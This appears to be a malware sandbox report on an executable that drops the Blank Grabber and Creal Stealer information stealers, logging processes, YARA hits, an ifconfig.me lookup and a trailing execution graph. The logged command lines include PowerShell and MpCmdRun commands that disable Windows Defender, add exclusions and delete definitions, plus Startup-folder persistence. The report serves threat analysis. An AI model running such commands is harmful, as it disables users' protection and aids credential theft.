                                                                                                                                                                                                                                                      2192.168.2.64979434.160.111.145803164C:\Windows\System32\curl.exe
Timestamp: Nov 10, 2024 17:02:43.002326012 CET
Bytes transferred: 75
Direction: OUT
Data: GET / HTTP/1.1
                                                                                                                                                                                                                                                      Host: ifconfig.me
                                                                                                                                                                                                                                                      User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                      Accept: */*
Timestamp: Nov 10, 2024 17:02:43.607237101 CET
Bytes transferred: 165
Direction: IN
Data: HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      date: Sun, 10 Nov 2024 16:02:42 GMT
                                                                                                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                                                                                                      Content-Length: 14
                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                                      Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32
                                                                                                                                                                                                                                                      Data Ascii: 173.254.250.72



                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:11:02:13
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff606380000
                                                                                                                                                                                                                                                      File size:24'810'296 bytes
                                                                                                                                                                                                                                                      MD5 hash:3AC5F99224A92851C80FE4178FFF6002
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                      Start time:11:02:14
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6d9240000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:11:02:14
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Built.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff65e280000
                                                                                                                                                                                                                                                      File size:7'849'062 bytes
                                                                                                                                                                                                                                                      MD5 hash:12E9F3CE18351EE539646C23CC862C5C
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:11:02:15
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Built.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff65e280000
                                                                                                                                                                                                                                                      File size:7'849'062 bytes
                                                                                                                                                                                                                                                      MD5 hash:12E9F3CE18351EE539646C23CC862C5C
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                      Start time:11:02:17
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6d9240000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'
                                                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                      Start time:11:02:19
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                      Start time:11:02:19
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                      Imagebase:0x7ff7c4f90000
                                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                      Start time:11:02:19
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                      Imagebase:0x7ff75ae80000
                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                                      Start time:11:02:21
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                      Start time:11:02:21
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                      Start time:11:02:21
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl ifconfig.me
                                                                                                                                                                                                                                                      Imagebase:0x7ff7f84e0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                      Start time:11:02:23
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                      Imagebase:0x7ff717f30000
                                                                                                                                                                                                                                                      File size:496'640 bytes
                                                                                                                                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                      Start time:11:02:30
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                      Imagebase:0x7ff6eb860000
                                                                                                                                                                                                                                                      File size:468'120 bytes
                                                                                                                                                                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                      Start time:11:02:37
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff7da470000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                                      Start time:11:02:39
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff7da470000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                      Start time:11:02:41
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                      Start time:11:02:41
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                      Start time:11:02:41
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl ifconfig.me
                                                                                                                                                                                                                                                      Imagebase:0x7ff7f84e0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true


                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:13.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:30.9%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:32
21211->21212 21212->21204 21218 7ff606389c00 21212->21218 21216 7ff606389aef 21213->21216 21224 7ff60638ae88 45 API calls _snwprintf 21213->21224 21225 7ff6063ad62c 31 API calls 2 library calls 21216->21225 21217->21211 21219 7ff606389c40 21218->21219 21221 7ff606389c69 21218->21221 21226 7ff6063ad62c 31 API calls 2 library calls 21219->21226 21221->21204 21223 7ff6063906ca 21222->21223 21223->21213 21224->21216 21225->21217 21226->21221 21243 7ff60638d43c 21227->21243 21231 7ff60638d851 _snwprintf 21239 7ff60638d8e0 21231->21239 21257 7ff6063ad348 21231->21257 21284 7ff606383550 33 API calls 21231->21284 21233 7ff60638d90f 21235 7ff60638d983 21233->21235 21238 7ff60638d9ab 21233->21238 21236 7ff6063a5c30 _handle_error 8 API calls 21235->21236 21237 7ff60638d997 21236->21237 21237->20977 21240 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21238->21240 21239->21233 21285 7ff606383550 33 API calls 21239->21285 21241 7ff60638d9b0 21240->21241 21244 7ff60638d5d1 21243->21244 21245 7ff60638d46e 21243->21245 21247 7ff60638ca1c 21244->21247 21245->21244 21246 7ff606381734 33 API calls 21245->21246 21246->21245 21248 7ff60638ca52 21247->21248 21255 7ff60638cb1c 21247->21255 21249 7ff60638ca62 21248->21249 21252 7ff60638cb17 21248->21252 21253 7ff60638cabc 21248->21253 21249->21231 21286 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21252->21286 21253->21249 21256 7ff6063a5ae0 4 API calls 21253->21256 21287 7ff606381bd4 33 API calls std::_Xinvalid_argument 21255->21287 21256->21249 21258 7ff6063ad38e 21257->21258 21259 7ff6063ad3a6 21257->21259 21288 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 21258->21288 21259->21258 21261 7ff6063ad3b0 21259->21261 21290 7ff6063ab348 35 API calls 2 library calls 21261->21290 21262 7ff6063ad393 21289 7ff6063aae74 31 API calls _invalid_parameter_noinfo_noreturn 21262->21289 21265 7ff6063a5c30 _handle_error 8 API calls 21267 7ff6063ad563 21265->21267 21266 
